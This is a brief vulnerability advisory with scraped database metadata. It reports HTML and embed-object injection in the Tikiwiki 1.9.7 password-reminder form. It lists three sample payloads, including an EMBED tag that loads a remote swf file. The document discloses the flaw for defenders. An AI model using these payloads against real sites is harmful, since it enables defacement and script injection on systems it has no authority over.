Tikiwiki
Version: 1.9.7
Example Address
http://example.com/tiki-remind_password.php
Overview:
The following codes can be added to the HTML password page by placing the HTML codes in the user name input box and hitting the "send me my password" button.
Examples:
1.<br><br><b><u>XSS</u></b>
2.<EMBED SRC="http://site.com/xss.swf"
3.<html><fontcolor="Red"><b>Pwned</b></font></html>
{"id": "SECURITYVULNS:DOC:17884", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "Tikiwiki 1.9.7 HTML/embed object injection", "description": "Tikiwiki \r\nVersion: 1.9.7 \r\n\r\nExample Address \r\nhttp://example.com/tiki-remind_password.php\r\n\r\nOverview:\r\nThe following codes can be added to the HTML password page by placing the HTML codes in the user name input box and hitting the "send me my password" button. \r\n\r\nExamples:\r\n1.<br><br><b><u>XSS</u></b>\r\n2.<EMBED SRC="http://site.com/xss.swf"\r\n3.<html><fontcolor="Red"><b>Pwned</b></font></html>", "published": "2007-08-25T00:00:00", "modified": "2007-08-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17884", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:23", "viewCount": 42, "enchantments": {"score": {"value": 1.0, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:8088"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 1.0}, "_state": {"dependencies": 1678962117, "score": 1698853398, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "3bc4b10a1f70186b75255bbb939de0f5"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}
Tikiwiki 1.9.7 HTML/embed object injection